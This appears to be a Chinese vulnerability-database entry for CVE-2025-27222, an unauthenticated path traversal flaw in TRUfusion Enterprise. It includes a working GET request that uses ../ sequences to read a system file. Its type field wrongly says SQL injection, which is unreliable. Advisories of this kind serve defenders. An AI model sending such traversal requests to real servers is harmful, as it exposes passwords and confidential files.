返回列表

TRUfusion Enterprise /trufusionPortal/getCobrandingData 文件读取漏洞（CVE-2025-27222）

CVE: CVE-2025-27222

CNVD: 暂无

CNNVD: 暂无

漏洞类型: SQL注入

漏洞等级: 高危

年份: 2026

POC_ID: 94527

漏洞描述

该漏洞为TRUfusion Enterprise ≤ 7.10.4.0存在的路径穿越漏洞，允许未认证攻击者读取服务器任意文件，从而泄露敏感明文密码、配置文件及其他机密数据 GET /trufusionPortal/getCobrandingData?cobrandingImageName=../../../../../../Windows/System32/drivers/etc/hosts HTTP/1.1

影响范围

TRUfusion Enterprise

漏洞详情

登录后可查看漏洞详情。请先登录或注册。

漏洞 POC

登录后可查看漏洞 POC。请先登录或注册。

修复建议

暂无

参考来源

https://rss.biu.life/ti/TRUfusion%20Enterprise%20/trufusionPortal/getCobrandingData%20%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2025-27222%EF%BC%89